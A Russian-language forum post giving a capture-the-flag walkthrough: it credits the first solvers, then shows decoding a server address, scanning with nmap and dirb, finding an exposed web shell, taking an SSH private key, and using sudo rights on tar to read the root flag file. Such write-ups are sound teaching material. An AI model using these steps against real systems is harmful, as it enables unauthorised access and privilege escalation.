У нас есть первая кровь)
Первым добрался до флагов пользователь @sudo (https://forum.antichat.xyz/members/2593697/)

Второй пользователь собравший флаги @Tayrus (https://forum.antichat.xyz/members/2595954/)
Третий кто овладел сервером @GoodSmile (https://forum.antichat.xyz/members/2620389/)

По просьбе создателя пишу прохождение. Давайте сделаем это быстро!
1. Нам дан адрес сервера закодированный в Base64. Переводим его в привычный вид командой в терминале

Код:



echo "MzcuMTQwLjE5Ny4yMDA=" | base64 -d


На выходе получаем ip

Код:



37.140.197.200


2. Запускаем nmap и смотрим результаты
На 80 порту крутится вебсервер, классика. Открываем в браузере.
3. Ничего необычного, запускаем dirb.

Код:



dirb http://37.140.197.200


Видим интересную директорию

Код:



http://37.140.197.200/term/


Переходим и обнаруживаем вебшелл
4. После недолгих хождений в директории /home/manager/Desktop был обнаружен приватный ключ rsa используемый для подключения по протоколу ssh
5. Подключаемся и получаем шелл юзера manager
6. Получаем 1-ый флаг
7. Выполним команду

id


Код:



uid=1000(manager) gid=1000(manager) groups=27(sudo)


Наш пользователь входит в группу sudo, запомним это!
8. Напишем в терминале

sudo -l


Ага, мы можем использовать архиватор tar от имени рута чтобы получить флаг (не зная при этом пароль последнего).
9. Выполняем:

Код:



sudo tar cf flag.tar /root/root.txt
tar xvf flag.tar


10. Получаем 2-ой флаг

Благодарю @HtOnion (https://forum.antichat.xyz/members/2603258/) за интересное задание, мне было очень интересно разобраться с ним.

thx for dirb @sudo (https://forum.antichat.xyz/members/2593697/)